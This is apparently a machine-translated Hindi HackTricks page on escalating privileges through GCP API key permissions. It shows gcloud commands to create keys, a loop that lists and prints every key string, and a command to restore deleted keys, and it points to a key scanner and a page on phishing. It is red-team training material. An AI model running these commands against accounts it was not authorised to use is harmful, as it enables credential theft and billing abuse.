GCP - Apikeys Privesc

AWS हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएं की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह या हमें ट्विटर 🐦 @hacktricks_live** पर फॉलो** करें।
हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके HackTricks और HackTricks Cloud github रेपो में।

एपीआई कुंजी

निम्नलिखित अनुमतियाँ एपीआई कुंजी बनाने और चुराने के लिए उपयोगी हैं, नहीं यह दस्तावेज़ से: एक एपीआई कुंजी एक सरल एन्क्रिप्टेड स्ट्रिंग है जो किसी प्रिंसिपल के बिना किसी एप्लिकेशन की पहचान करता है। ये सार्वजनिक डेटा को गुमनामी से एक्सेस करने के लिए उपयोगी हैं, और आपके परियोजना के साथ API अनुरोधों को कोटा और बिलिंग के लिए संबंधित करने के लिए उपयोग किए जाते हैं।

इसलिए, एक एपीआई कुंजी के साथ आप उस कंपनी को अपने एपीआई के उपयोग के लिए भुगतान करने के लिए कर सकते हैं, लेकिन आपको विशेषाधिकारों को वृद्धि करने की अनुमति नहीं होगी।

एपीआई कुंजी के बारे में अधिक जानकारी के लिए देखें:

GCP - API Keys Enum

एपीआई कुंजी बनाने के अन्य तरीके के लिए देखें:

GCP - Serviceusage Privesc

ब्रूट फोर्स एपीआई कुंजी एक्सेस

आपको शायद पता नहीं हो कि परियोजना में कौन सी एपीआई सक्षम हैं या आपके द्वारा पाए गए एपीआई कुंजी पर लागू प्रतिबंध हैं, इसलिए यह दौड़ने लायक होगा उपकरण https://github.com/ozguralp/gmapsapiscanner चलाना और जांचना कि आप एपीआई कुंजी के साथ क्या एक्सेस कर सकते हैं।

`apikeys.keys.create`

इस अनुमति से एक एपीआई कुंजी बनाने की अनुमति है:

gcloud services api-keys create
Operation [operations/akmf.p7-[...]9] complete. Result: {
"@type":"type.googleapis.com/google.api.apikeys.v2.Key",
"createTime":"2022-01-26T12:23:06.281029Z",
"etag":"W/\"HOhA[...]==\"",
"keyString":"AIzaSy[...]oU",
"name":"projects/5[...]6/locations/global/keys/f707[...]e8",
"uid":"f707[...]e8",
"updateTime":"2022-01-26T12:23:06.378442Z"
}

आप एक स्क्रिप्ट पा सकते हैं जो एक वल्नरबल वातावरण का निर्माण, शोषण और सफाई करने को स्वचालित करने के लिए यहाँ है।

ध्यान दें कि डिफ़ॉल्ट रूप से उपयोगकर्ताओं को नए परियोजनाएँ बनाने की अनुमति होती है और उन्हें नए परियोजना पर मालिक भूमिका प्रदान की जाती है। इसलिए एक उपयोगकर्ता एक परियोजना और इस परियोजना के अंदर एक API कुंजी बना सकता है।

`apikeys.keys.getKeyString` , `apikeys.keys.list`

ये अनुमतियाँ सभी एपीआई कुंजीयों को सूचीबद्ध करने और प्राप्त करने की अनुमति देती हैं:

for  key  in  $(gcloud services api-keys list --uri); do
gcloud services api-keys get-key-string "$key"
done

आप यहाँ एक स्क्रिप्ट पा सकते हैं जो एक वल्नरबल वातावरण का निर्माण, शोषण और सफाई करने को स्वचालित करने के लिए।

`apikeys.keys.undelete` , `apikeys.keys.list`

ये अनुमतियाँ आपको हटाए गए एपीआई कुंजी की सूची और पुनर्जीवित करने की अनुमति देती हैं। एपीआई कुंजी को आउटपुट में दी जाती है जब undelete किया जाता है:

gcloud services api-keys list --show-deleted
gcloud services api-keys undelete <key-uid>

अन्य कर्मचारियों को फिशिंग करने के लिए आंतरिक OAuth एप्लिकेशन बनाएं

इसे कैसे करें इसे सीखने के लिए निम्नलिखित पृष्ठ की जाँच करें, हालांकि यह कार्रवाई सेवा clientauthconfig दस्तावेजों के अनुसार के अंतर्गत है:

GWS - Google Platforms Phishing

AWS हैकिंग सीखें और अभ्यास करें:HackTricks प्रशिक्षण AWS रेड टीम विशेषज्ञ (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks प्रशिक्षण GCP रेड टीम विशेषज्ञ (GRTE)

हैकट्रिक्स का समर्थन करें

सदस्यता योजनाएँ की जाँच करें!
शामिल हों 💬 डिस्कॉर्ड समूह या टेलीग्राम समूह और ट्विटर 🐦 @hacktricks_live** को** फॉलो करें।
हैकिंग ट्रिक्स साझा करें HackTricks और HackTricks Cloud github रेपो में PR जमा करके।

PreviousGCP - Privilege Escalation NextGCP - AppEngine Privesc

Last updated 1 month ago